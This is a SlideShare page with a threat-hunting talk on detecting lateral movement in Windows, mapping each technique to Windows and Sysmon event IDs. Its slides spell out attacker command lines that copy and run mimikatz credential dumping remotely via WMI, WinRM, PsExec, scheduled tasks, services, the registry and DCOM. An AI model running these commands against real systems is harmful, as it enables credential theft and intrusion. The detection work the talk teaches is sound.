Sergey Soldatov, profile picture
Uploaded bySergey Soldatov
PDF, PPTX10,819 views

Hunting Lateral Movement in Windows Infrastructure

The document discusses various techniques attackers can use to launch executables remotely on Windows systems by leveraging compromised credentials and built-in OS functionality. It describes how to detect remotely launched executables using Windows Event and Sysmon logs. Specific techniques covered include remote file copy over SMB, remote execution via WMI, WinRM, Powershell Remoting, scheduled tasks, services, the registry, and WMI subscriptions. The document provides the event sequences and most interesting events to look for when hunting for evidence of each technique.

Technology
Related topics:
Information Security

Embed presentation

Download as PDF, PPTX
Hunting Lateral Movement in Windows Infrastructure Teymur Kheirkhabarov
Who Am I • Senior SOC Analyst @Kaspersky Lab • SibSAU (Krasnoyarsk) graduate • Ex- Infosec dept. head • Ex- Infosec admin • Ex- System admin • Twitter @HeirhabarovT • www.linkedin.com/in/teymur-kheirkhabarov-73490867/
What we’re going to talk about • Different ways to launch executables remotely by using compromised credentials and operating system functionality; • How to detect remotely launched executables with Windows Event and Sysmon logs.
Remote file copy over SMB • Copy to autostart locations for execution on login or boot • Copy to different locations for further execution via WMI, WinRM, Powershell Remoting, Task Scheduler, Service… • Programmatically • Using Explorer • Using standard console tools: • robocopy C:tools pc0002ADMIN$userspublic mimikatz.exe • powershell Copy-Item -Path mimikatz.exe -Destination pc0002C$userspublic • cmd /c "copy mimikatz.exe pc0002C$userspublic" • xcopy mimikatz.exe pc0002C$ProgramDataMicrosoftWindowsStart MenuProgramsStartup How • TCP/455 port is accessible on remote host • Administrative shares are enabled on remote host Requirements & limitations
Remote File Copy over SMB – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. Administrative share access (Windows EID 5140/5145) E4. File object access with WriteData or AddFile rights (Windows EID 4663) – if audit and SACL were configured
Remote File Copy over SMB – the most interesting events
Hunting: search for administrative shares connections
Windows File Auditing https://www.malwarearchaeology.com/s/Windows- File-Auditing-Cheat-Sheet-ver-Oct-2016.pdf
Hunting: search for file creation/changes in autostart locations
Remote execution via WMI • Programmatically • Using standard tools: • wmic /node:pc0002 process call create "cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt" • powershell Invoke-WmiMethod -ComputerName pc0002 -Class Win32_Process - Name Create -ArgumentList '"cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt"' • powershell -command "&{$process = [WMICLASS]'pc0002ROOTCIMV2:win32_process'; $process.Create('calc.exe'); }" • powershell -command "&{$process = get-wmiobject -query 'SELECT * FROM Meta_Class WHERE __Class = "Win32_Process"' -namespace 'rootcimv2' - computername pc0002; $process.Create( 'notepad.exe' );}" How • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host Requirements & limitations
Remote execution via WMI – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. WmiPrvSE.exe starts payload file (Sysmon EID 1)
Remote execution via WMI – the most interesting events
Remote execution via WinRM • Programmatically • Using Windows Remote Shell (WinRS) tool: • winrs -r:pc0002.test.local C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit • winrs -r:pc0002.test.local -u:dadmin C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit How • WinRM is enabled on remote host (disabled by default on client Windows versions) • TCP/5985 (TCP/5986) port is accessible on remote host Requirements & limitations
Remote execution via WinRM – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. svchost.exe starts WinrsHost.exe (Sysmon EID 1) E4. WinrsHost.exe starts payload file (Sysmon EID 1)
Remote execution via WinRM – the most interesting events
Remote execution via Powershell Remoting • Powershell scripts • Powershell Invoke-Command cmdlet: • powershell Invoke-Command -ComputerName pc0002.test.local -ScriptBlock {cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicpc0002_mimikatz_output.txt } • powershell Invoke-Command -ComputerName pc0002.test.local -credential TESTdadmin -ScriptBlock {cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicpc0002_mimikatz_output.txt } How • WinRM is enabled on remote host (disabled by default on client Windows versions) • TCP/5985 (TCP/5986) port is accessible on remote host Requirements & limitations
Remote execution via Powershell Remoting – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. svchost.exe starts wsmprovhost.exe (Sysmon EID 1) E4. wsmprovhost.exe starts payload file (Sysmon EID 1)
Remote execution via Powershell Remoting – the most interesting events
Remote execution via MMC20.Application COM How • Programmatically • Using powershell: powershell -command "&{$com=[activator]::CreateInstance([type]::GetTypeFromProgID('MMC20.Appli cation','pc0002.test.local')); $com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,'/c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicpc0002_mimikatz_output.txt','7')}" Requirements & limitations • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. svchost.exe starts mmc.exe (Sysmon EID 1) E4. mmc.exe starts payload file (Sysmon EID 1) Remote execution via MMC20.Application COM – events sequence on destination side
Remote execution via MMC20.Application COM – the most interesting events
Remote execution via PsExec (& clones, e.g. PaExec) • PsExex: • psexec.exe pc0002 -c mimikatz.exe privilege::debug sekurlsa::logonpasswords exit • PaExec: • paexec.exe pc0002 -c mimikatz.exe privilege::debug sekurlsa::logonpasswords exit How • ADMIN$ administrative share is enabled on remote host • TCP/445 port is accessible on remote host Requirements & limitations
E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. Copying PSEXESVC.exe to ADMIN$ (Windows EID 5140/5145) E4. psexesvc service is installed and started (Windows EID 7045/7036) Remote execution via PsExec (& clones) – events sequence on destination side E5. psexesvc.exe is started by services.exe (Sysmon EID 1) E6. psexesvc.exe starts payload file (Sysmon EID 1) E7. Interaction with payload stdin/stdout/stderr via SMB pipes (Windows EID 5145)
Remote execution via PsExec (& clones) – the most interesting events
Hunting: search for PsExec (& clones) artifacts – services
Hunting: search for PsExec (& clones) artifacts – access to pipes
Remote execution via PsExec (& clones) – the most interesting events
Hunting: search for executions in network logon sessions (WinRM, WMI, PsExec, Powershell Remoting, MMC20 COM)
Remote execution via ShellWindows COM How • Programmatically • Using powershell: powershell -command "&{$obj = [activator]::CreateInstance([Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF- A442-00A0C90A8F39','pc0002')); $obj.item().Document.Application.ShellExecute('cmd.exe','/c calc.exe','C:WindowsSystem32',$null,0)}" Requirements & limitations • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
Remote execution via ShellBrowserWindow COM How • Programmatically • Using powershell: powershell -command "&{$obj = [activator]::CreateInstance([Type]::GetTypeFromCLSID('C08AFD90-F2A1-11D1- 8455-00A0C91F3880','pc0002')); $obj.Document.Application.ShellExecute('cmd.exe','/c calc.exe','C:WindowsSystem32',$null,0)}" Requirements & limitations • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host • Doesn’t work for Windows 7 destination https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) Remote execution via ShellWindows or ShellBrowserWindow COM – events sequence on destination side E3. explorer.exe starts payload file in current session (Sysmon EID 1)
Remote execution via via ShellWindows or ShellBrowserWindow COM – how to detect??? Payload file is executed in the session of the current active user
Remote execution via Scheduled Tasks • Programmatically • Standard command line tools: • at 172.16.205.14 3:55 C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> win_mimikatz_output.txt • schtasks /create /S pc0002 /SC ONCE /ST 00:57:00 /TN "Adobe Update" /TR "cmd.exe /c C:userspublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt" How • TCP/135 port and RPC dynamic port range are accessible on remote host (in case of Schtasks usage) • TCP/445 port is accessible on remote host (in case of AT usage) Requirements & limitations
Remote execution via Scheduled Tasks – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. Access to atsvc SMB Pipe (Windows EID 5145) – in case of at.exe usage E6. taskeng.exe starts payload file (Sysmon EID 1) E4. Scheduled task is created or updated (Windows EID 4698/4702) E5. Task is triggered. svchost.exe starts taskeng.exe (Sysmon EID 1) Also there are some interesting event in Microsoft-Windows-TaskScheduler/Operational event log
Remote execution via Scheduled Tasks – the most interesting events
Hunting: search for remotely created or updated scheduler tasks
Remote execution via Scheduled Tasks – the most interesting events
Hunting: search for ATSVC pipe connections
Remote execution via Services • Programmatically • Standard command line tool: • sc pc0002 create "Remote service" binPath= "cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt" sc pc0002 start "Remote service" sc pc0002 delete »Remote service" How • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host Requirements & limitations
Remote execution via Services – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. New service is installed (Windows EID 7045/4697) E4. Start command is sent to installed service. services.exe starts payload file (Sysmon EID 1) E5. A timeout is reached (Windows EID 7009) E6. Failure while trying to start service (Windows EID 7000)
Remote execution via Services – the most interesting events
Hunting: search for remotely created services
Remote registry How • Programmatically • Using powershell or reg: • reg add pc0002HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /f /v GoogleUpdater /t REG_SZ /d "cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt" • powershell -command "&{$reg=[Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey("LocalMachin e", "pc0002"); $key=$reg.OpenSubKey("SOFTWAREMicrosoftWindowsCurrentVersionRu n",$True); $key.SetValue("GoogleUpdater","calc.exe");}" Requirements & limitations • TCP/445 port is accessible on remote host • Remote Registry service is enabled on remote host
Remote registry – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. WINREG pipe access (Windows EID 5145) E4. Registry value is modified (Windows EID 4657) – if audit and SACL were configured
Remote Registry – the most interesting events
Hunting: search for WINREG pipe connections
Windows Registry Auditing https://www.malwarearchaeology.com/s/Windows- Registry-Auditing-Cheat-Sheet-ver-Oct-2016.pdf
Hunting: search for changes in autostart registry keys
Remote WMI subscriptions creation
Remote WMI subscriptions creation – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. Writing to WMI Namespace (Windows EID 4662) – if audit and SACL were configured
WMI Namespaces Auditing
Remote WMI subscriptions creation – the most interesting events

More Related Content

PDF
Derbycon - The Unintended Risks of Trusting Active Directory
byWill Schroeder
 
PDF
Hunting for Credentials Dumping in Windows Environment
byTeymur Kheirkhabarov
 
PDF
How to Hunt for Lateral Movement on Your Network
bySqrrl
 
PDF
Hunting for Privilege Escalation in Windows Environment
byTeymur Kheirkhabarov
 
PDF
Windows Threat Hunting
byGIBIN JOHN
 
PDF
PHDays 2018 Threat Hunting Hands-On Lab
byTeymur Kheirkhabarov
 
PPTX
I hunt sys admins 2.0
byWill Schroeder
 
PPTX
Bsides 2019 - Intelligent Threat Hunting
byDhruv Majumdar
 
Derbycon - The Unintended Risks of Trusting Active Directory
byWill Schroeder
 
Hunting for Credentials Dumping in Windows Environment
byTeymur Kheirkhabarov
 
How to Hunt for Lateral Movement on Your Network
bySqrrl
 
Hunting for Privilege Escalation in Windows Environment
byTeymur Kheirkhabarov
 
Windows Threat Hunting
byGIBIN JOHN
 
PHDays 2018 Threat Hunting Hands-On Lab
byTeymur Kheirkhabarov
 
I hunt sys admins 2.0
byWill Schroeder
 
Bsides 2019 - Intelligent Threat Hunting
byDhruv Majumdar
 

What's hot

PDF
A Threat Hunter Himself
bySergey Soldatov
 
PDF
Threat Hunting with Splunk Hands-on
bySplunk
 
PPTX
Threat hunting for Beginners
bySKMohamedKasim
 
PPTX
Developing High-Impact Malware with Minimal Effort.pptx
byElvin Gentiles
 
PPTX
Cyber Threat Hunting Workshop
byDigit Oktavianto
 
PDF
Threat Hunting Procedures and Measurement Matrice
byVishal Kumar
 
PDF
Fantastic Red Team Attacks and How to Find Them
byRoss Wolf
 
PDF
Threat Hunting with Splunk
bySplunk
 
PPTX
Catch Me If You Can: PowerShell Red vs Blue
byWill Schroeder
 
PPTX
PowerShell for Practical Purple Teaming
byNikhil Mittal
 
PPTX
Adversary Emulation using CALDERA
byErik Van Buggenhout
 
PDF
Threat Hunting Workshop
bySplunk
 
PPTX
Threat hunting - Every day is hunting season
byBen Boyd
 
PPTX
PSConfEU - Offensive Active Directory (With PowerShell!)
byWill Schroeder
 
PDF
Introduction to red team operations
bySunny Neo
 
PDF
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
byShakacon
 
PDF
Securing AEM webapps by hacking them
byMikhail Egorov
 
PDF
What is ATT&CK coverage, anyway? Breadth and depth analysis with Atomic Red Team
byMITRE ATT&CK
 
PPTX
Invoke-Obfuscation DerbyCon 2016
byDaniel Bohannon
 
PPTX
Red team Engagement
byIndranil Banerjee
 
A Threat Hunter Himself
bySergey Soldatov
 
Threat Hunting with Splunk Hands-on
bySplunk
 
Threat hunting for Beginners
bySKMohamedKasim
 
Developing High-Impact Malware with Minimal Effort.pptx
byElvin Gentiles
 
Cyber Threat Hunting Workshop
byDigit Oktavianto
 
Threat Hunting Procedures and Measurement Matrice
byVishal Kumar
 
Fantastic Red Team Attacks and How to Find Them
byRoss Wolf
 
Threat Hunting with Splunk
bySplunk
 
Catch Me If You Can: PowerShell Red vs Blue
byWill Schroeder
 
PowerShell for Practical Purple Teaming
byNikhil Mittal
 
Adversary Emulation using CALDERA
byErik Van Buggenhout
 
Threat Hunting Workshop
bySplunk
 
Threat hunting - Every day is hunting season
byBen Boyd
 
PSConfEU - Offensive Active Directory (With PowerShell!)
byWill Schroeder
 
Introduction to red team operations
bySunny Neo
 
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
byShakacon
 
Securing AEM webapps by hacking them
byMikhail Egorov
 
What is ATT&CK coverage, anyway? Breadth and depth analysis with Atomic Red Team
byMITRE ATT&CK
 
Invoke-Obfuscation DerbyCon 2016
byDaniel Bohannon
 
Red team Engagement
byIndranil Banerjee
 

Viewers also liked

PDF
Kaspersky managed protection
bySergey Soldatov
 
PPTX
Kheirkhabarov24052017_phdays7
byTeymur Kheirkhabarov
 
PPTX
Горизонтальные перемещения в инфраструктуре Windows
byPositive Hack Days
 
PDF
Ansible to provision your machines
byFellipe Callegas
 
PDF
Ansible party in the [Google] clouds
byEsther Lozano
 
PDF
Трудовые будни охотника на угрозы
bySergey Soldatov
 
PDF
Threat hunting as SOC process
bySergey Soldatov
 
PDF
Охота на угрозы на BIS summit 2016
bySergey Soldatov
 
PPTX
PuppetConf 2017: Inviting Windows to the Puppet Party- Chris Kittell & Derek ...
byPuppet
 
PPTX
Pwning the Enterprise With PowerShell
byBeau Bullock
 
PPTX
BSides London 2017 - Hunt Or Be Hunted
byAlex Davies
 
PPTX
Obfuscating The Empire
byRyan Cobb
 
PDF
A Case Study in Attacking KeePass
byWill Schroeder
 
PDF
Ace Up the Sleeve
byWill Schroeder
 
PDF
SANS DFIR Prague: PowerShell & WMI
byJoe Slowik
 
PPTX
Invoke-Obfuscation nullcon 2017
byDaniel Bohannon
 
PPTX
WMI for Penetration Testers - Arcticcon 2017
byAlexander Polce Leary
 
PPTX
Building Better Backdoors with WMI - DerbyCon 2017
byAlexander Polce Leary
 
PPTX
Taking the Attacker Eviction Red Pill (v2.0)
byFrode Hommedal
 
PDF
MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...
byChris Thompson
 
Kaspersky managed protection
bySergey Soldatov
 
Kheirkhabarov24052017_phdays7
byTeymur Kheirkhabarov
 
Горизонтальные перемещения в инфраструктуре Windows
byPositive Hack Days
 
Ansible to provision your machines
byFellipe Callegas
 
Ansible party in the [Google] clouds
byEsther Lozano
 
Трудовые будни охотника на угрозы
bySergey Soldatov
 
Threat hunting as SOC process
bySergey Soldatov
 
Охота на угрозы на BIS summit 2016
bySergey Soldatov
 
PuppetConf 2017: Inviting Windows to the Puppet Party- Chris Kittell & Derek ...
byPuppet
 
Pwning the Enterprise With PowerShell
byBeau Bullock
 
BSides London 2017 - Hunt Or Be Hunted
byAlex Davies
 
Obfuscating The Empire
byRyan Cobb
 
A Case Study in Attacking KeePass
byWill Schroeder
 
Ace Up the Sleeve
byWill Schroeder
 
SANS DFIR Prague: PowerShell & WMI
byJoe Slowik
 
Invoke-Obfuscation nullcon 2017
byDaniel Bohannon
 
WMI for Penetration Testers - Arcticcon 2017
byAlexander Polce Leary
 
Building Better Backdoors with WMI - DerbyCon 2017
byAlexander Polce Leary
 
Taking the Attacker Eviction Red Pill (v2.0)
byFrode Hommedal
 
MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...
byChris Thompson
 

Similar to Hunting Lateral Movement in Windows Infrastructure

PPTX
DFIR Austin Training (Feb 2020): Remote Access & Deploying Agents
byChristopher Gerritz
 
PDF
InSecure Remote Operations - NullCon 2023 by Yossi Sassi
byYossi Sassi
 
PPTX
Hacking Microsoft Remote Desktop Services for Fun and Profit
byAlisa Esage Шевченко
 
PPTX
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
byEC-Council
 
PDF
Derbycon 2017: Hunting Lateral Movement For Fun & Profit
byMauricio Velazco
 
PDF
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
byZoltan Balazs
 
PDF
RemoteExec Presentation
byIS Decisions
 
PDF
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
byPriyanka Aash
 
PPTX
BSides Ottawa 2019 - HTB Blue
byDianaWhitney4
 
PDF
Bsides NYC 2018 - Hunting for Lateral Movement
byMauricio Velazco
 
PPTX
Feb 2010 Intro To Remoteing Part1
bySoutheast Michigan PowerShell Script Club
 
PPTX
Bsides final
byCollyn Hartley
 
PDF
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
byShakacon
 
PPTX
Nous Sommes Cyber - HTB Blue
byDianaWhitney4
 
PPT
Stuxnet dc9723
byIftach Ian Amit
 
PPTX
BSIDES-PR Keynote Hunting for Bad Guys
byJoff Thyer
 
PDF
Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE
byDragos, Inc.
 
PPTX
Windows Command Line Tools
bylove4upratik
 
PDF
RemoteExec DataSheet
byIS Decisions
 
PDF
Pennington - Defending Against Targeted Ransomware with MITRE ATT&CK
byAdam Pennington
 
DFIR Austin Training (Feb 2020): Remote Access & Deploying Agents
byChristopher Gerritz
 
InSecure Remote Operations - NullCon 2023 by Yossi Sassi
byYossi Sassi
 
Hacking Microsoft Remote Desktop Services for Fun and Profit
byAlisa Esage Шевченко
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
byEC-Council
 
Derbycon 2017: Hunting Lateral Movement For Fun & Profit
byMauricio Velazco
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
byZoltan Balazs
 
RemoteExec Presentation
byIS Decisions
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
byPriyanka Aash
 
BSides Ottawa 2019 - HTB Blue
byDianaWhitney4
 
Bsides NYC 2018 - Hunting for Lateral Movement
byMauricio Velazco
 
Feb 2010 Intro To Remoteing Part1
bySoutheast Michigan PowerShell Script Club
 
Bsides final
byCollyn Hartley
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
byShakacon
 
Nous Sommes Cyber - HTB Blue
byDianaWhitney4
 
Stuxnet dc9723
byIftach Ian Amit
 
BSIDES-PR Keynote Hunting for Bad Guys
byJoff Thyer
 
Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE
byDragos, Inc.
 
Windows Command Line Tools
bylove4upratik
 
RemoteExec DataSheet
byIS Decisions
 
Pennington - Defending Against Targeted Ransomware with MITRE ATT&CK
byAdam Pennington
 

More from Sergey Soldatov

PDF
Metrics in Security Operations
bySergey Soldatov
 
PDF
Сколько надо SOC?
bySergey Soldatov
 
PDF
От мониторинга к форенсике и обратно
bySergey Soldatov
 
PDF
Роботы среди нас!
bySergey Soldatov
 
PDF
How MITRE ATT&CK helps security operations
bySergey Soldatov
 
PDF
Практика обнаружения атак, использующих легальные инструменты
bySergey Soldatov
 
PDF
Reducing cyber risks in the era of digital transformation
bySergey Soldatov
 
PDF
Мониторинг своими руками
bySergey Soldatov
 
PDF
Вопросы к DLP
bySergey Soldatov
 
PDF
модульный под к документир V5
bySergey Soldatov
 
PDF
IDM - это непросто!
bySergey Soldatov
 
PDF
Некриптографическое исследование носителей православной криптографии
bySergey Soldatov
 
PDF
Opensource vs. Non-opensource
bySergey Soldatov
 
PDF
Примерные критерии оценки IDM
bySergey Soldatov
 
PDF
PHDays '14 Cracking java pseudo random sequences by egorov & soldatov
bySergey Soldatov
 
PDF
Infosecurity management in the Enterprise
bySergey Soldatov
 
PDF
Безопасность мобильных устройств
bySergey Soldatov
 
PDF
How to catch your “hacker” or makeshift security
bySergey Soldatov
 
PDF
Drive by-download attack evolution zero nights v3
bySergey Soldatov
 
Metrics in Security Operations
bySergey Soldatov
 
Сколько надо SOC?
bySergey Soldatov
 
От мониторинга к форенсике и обратно
bySergey Soldatov
 
Роботы среди нас!
bySergey Soldatov
 
How MITRE ATT&CK helps security operations
bySergey Soldatov
 
Практика обнаружения атак, использующих легальные инструменты
bySergey Soldatov
 
Reducing cyber risks in the era of digital transformation
bySergey Soldatov
 
Мониторинг своими руками
bySergey Soldatov
 
Вопросы к DLP
bySergey Soldatov
 
модульный под к документир V5
bySergey Soldatov
 
IDM - это непросто!
bySergey Soldatov
 
Некриптографическое исследование носителей православной криптографии
bySergey Soldatov
 
Opensource vs. Non-opensource
bySergey Soldatov
 
Примерные критерии оценки IDM
bySergey Soldatov
 
PHDays '14 Cracking java pseudo random sequences by egorov & soldatov
bySergey Soldatov
 
Infosecurity management in the Enterprise
bySergey Soldatov
 
Безопасность мобильных устройств
bySergey Soldatov
 
How to catch your “hacker” or makeshift security
bySergey Soldatov
 
Drive by-download attack evolution zero nights v3
bySergey Soldatov
 

Recently uploaded

PDF
Chapter 4 Network Security in computer security
byGetnet Tigabie Askale -(GM)
 
PDF
GenerationAI Paris 2025 | How Agentic AI is Reinventing Organizations
byapidays
 
PDF
Track Phone Location by Number (2026)_ What’s Actually Possible for Free (and...
byEmily Woods
 
PPTX
Introduction to Artificial Intelligence (AI).pptx
byammar414783
 
PDF
The Enterprise Web3 Landscape - a view from Kaleido based on the past 10 year...
byPeter Broadhurst
 
PPTX
Working Session — Build a Document Understanding Automation Using an OOTB ML ...
byDianaGray10
 
PPTX
Beyond the Algorithm: Designing Human-Centric Public Service with AI
byAlan Dix
 
PPTX
Retrieval Augmented Generation- The Synergistic Power of Prompt Engineering
bySemantic SEO BD
 
PDF
Designing a Blog Using Wordpress
bymarkzubi50
 
PDF
Poročilo odbora CIS (CH08873) za leto 2025 na letni skupščini IEEE Slovenija ...
byUniversity of Maribor
 
PDF
Title Installing Windows, Linux, MacOS.pdf
byGeraldAbadajos
 
PDF
TravelTech Paris 2025 | The EU Digital Identity Wallet and it’s impact on Tra...
byapidays
 
PDF
Writing GPU-Ready AI Models in Pure Java with Babylon
byAna-Maria Mihalceanu
 
PDF
Advanced SELinux Management - RHCSA (RH134).pdf
byLinuxCert Guru
 
PDF
The Manifesto for AI-enabled Governance !
byYannis Charalabidis
 
PDF
BEP-20 Token on BNB Chain: From Concept to Deployment.pdf
byimoliviabennett
 
PDF
Safer’s Picks: The 5 FME Transformers You Didn’t Know You Needed
bySafe Software
 
PPTX
Automation Without Apprentices: How AI Challenges the Open Source Way
byIcinga
 
PDF
Startup Formation Collapses While Acquisition Activity Hits New High!
byMemoori
 
PDF
Getting Started with Apache Spark: Big Data Made Simple [Free Meetup]
byHaim Michael
 
Chapter 4 Network Security in computer security
byGetnet Tigabie Askale -(GM)
 
GenerationAI Paris 2025 | How Agentic AI is Reinventing Organizations
byapidays
 
Track Phone Location by Number (2026)_ What’s Actually Possible for Free (and...
byEmily Woods
 
Introduction to Artificial Intelligence (AI).pptx
byammar414783
 
The Enterprise Web3 Landscape - a view from Kaleido based on the past 10 year...
byPeter Broadhurst
 
Working Session — Build a Document Understanding Automation Using an OOTB ML ...
byDianaGray10
 
Beyond the Algorithm: Designing Human-Centric Public Service with AI
byAlan Dix
 
Retrieval Augmented Generation- The Synergistic Power of Prompt Engineering
bySemantic SEO BD
 
Designing a Blog Using Wordpress
bymarkzubi50
 
Poročilo odbora CIS (CH08873) za leto 2025 na letni skupščini IEEE Slovenija ...
byUniversity of Maribor
 
Title Installing Windows, Linux, MacOS.pdf
byGeraldAbadajos
 
TravelTech Paris 2025 | The EU Digital Identity Wallet and it’s impact on Tra...
byapidays
 
Writing GPU-Ready AI Models in Pure Java with Babylon
byAna-Maria Mihalceanu
 
Advanced SELinux Management - RHCSA (RH134).pdf
byLinuxCert Guru
 
The Manifesto for AI-enabled Governance !
byYannis Charalabidis
 
BEP-20 Token on BNB Chain: From Concept to Deployment.pdf
byimoliviabennett
 
Safer’s Picks: The 5 FME Transformers You Didn’t Know You Needed
bySafe Software
 
Automation Without Apprentices: How AI Challenges the Open Source Way
byIcinga
 
Startup Formation Collapses While Acquisition Activity Hits New High!
byMemoori
 
Getting Started with Apache Spark: Big Data Made Simple [Free Meetup]
byHaim Michael
 

Hunting Lateral Movement in Windows Infrastructure

  • 1.
    Hunting Lateral Movementin Windows Infrastructure Teymur Kheirkhabarov
  • 2.
    Who Am I •Senior SOC Analyst @Kaspersky Lab • SibSAU (Krasnoyarsk) graduate • Ex- Infosec dept. head • Ex- Infosec admin • Ex- System admin • Twitter @HeirhabarovT • www.linkedin.com/in/teymur-kheirkhabarov-73490867/
  • 3.
    What we’re goingto talk about • Different ways to launch executables remotely by using compromised credentials and operating system functionality; • How to detect remotely launched executables with Windows Event and Sysmon logs.
  • 4.
    Remote file copyover SMB • Copy to autostart locations for execution on login or boot • Copy to different locations for further execution via WMI, WinRM, Powershell Remoting, Task Scheduler, Service… • Programmatically • Using Explorer • Using standard console tools: • robocopy C:tools pc0002ADMIN$userspublic mimikatz.exe • powershell Copy-Item -Path mimikatz.exe -Destination pc0002C$userspublic • cmd /c "copy mimikatz.exe pc0002C$userspublic" • xcopy mimikatz.exe pc0002C$ProgramDataMicrosoftWindowsStart MenuProgramsStartup How • TCP/455 port is accessible on remote host • Administrative shares are enabled on remote host Requirements & limitations
  • 5.
    Remote File Copyover SMB – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. Administrative share access (Windows EID 5140/5145) E4. File object access with WriteData or AddFile rights (Windows EID 4663) – if audit and SACL were configured
  • 6.
    Remote File Copyover SMB – the most interesting events
  • 7.
    Hunting: search foradministrative shares connections
  • 8.
  • 9.
    Hunting: search forfile creation/changes in autostart locations
  • 10.
    Remote execution viaWMI • Programmatically • Using standard tools: • wmic /node:pc0002 process call create "cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt" • powershell Invoke-WmiMethod -ComputerName pc0002 -Class Win32_Process - Name Create -ArgumentList '"cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt"' • powershell -command "&{$process = [WMICLASS]'pc0002ROOTCIMV2:win32_process'; $process.Create('calc.exe'); }" • powershell -command "&{$process = get-wmiobject -query 'SELECT * FROM Meta_Class WHERE __Class = "Win32_Process"' -namespace 'rootcimv2' - computername pc0002; $process.Create( 'notepad.exe' );}" How • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host Requirements & limitations
  • 11.
    Remote execution viaWMI – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. WmiPrvSE.exe starts payload file (Sysmon EID 1)
  • 12.
    Remote execution viaWMI – the most interesting events
  • 13.
    Remote execution viaWinRM • Programmatically • Using Windows Remote Shell (WinRS) tool: • winrs -r:pc0002.test.local C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit • winrs -r:pc0002.test.local -u:dadmin C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit How • WinRM is enabled on remote host (disabled by default on client Windows versions) • TCP/5985 (TCP/5986) port is accessible on remote host Requirements & limitations
  • 14.
    Remote execution viaWinRM – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. svchost.exe starts WinrsHost.exe (Sysmon EID 1) E4. WinrsHost.exe starts payload file (Sysmon EID 1)
  • 15.
    Remote execution viaWinRM – the most interesting events
  • 16.
